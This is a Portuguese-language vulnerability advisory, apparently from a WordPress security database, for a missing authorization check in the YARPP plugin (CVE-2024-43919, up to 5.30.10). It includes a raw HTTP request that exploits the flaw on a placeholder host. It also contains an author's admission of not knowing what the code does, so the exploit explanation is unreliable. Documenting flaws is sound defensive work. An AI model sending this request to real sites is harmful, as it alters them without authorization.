
YARPP <= 5.30.10 - Autorização Ausente
YARPP <= 5.30.10 - Autorização Ausente
O plugin YARPP – Yet Another Related Posts Plugin para WordPress é vulnerável a acesso não autorizado devido à falta de uma verificação de capacidade no arquivo ~/includes/yarpp_pro_set_display_types.php em todas as versões até, e incluindo, 5.30.10. Isso possibilita que atacantes não autenticados definam tipos de exibição.
Type: plugin
CVSS Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE: CVE-2024-43919
Slug: yet-another-related-posts-plugin
Não faço ideia do que isso realmente faz.
Aqui está um exemplo de uma requisição HTTP bruta que explora a vulnerabilidade no plugin YARPP:
GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: example.com
Nesta requisição:
ypsdt é definido como false para contornar a verificação inicial no código.types[] é usado para especificar os tipos de exibição a serem definidos. Neste exemplo, post e page são passados como tipos.Host especifica o site WordPress alvo que hospeda o plugin YARPP vulnerável.Quando esta requisição é enviada a um site WordPress com uma versão vulnerável do plugin YARPP instalada, ela definirá os tipos de exibição sem exigir qualquer autenticação ou autorização.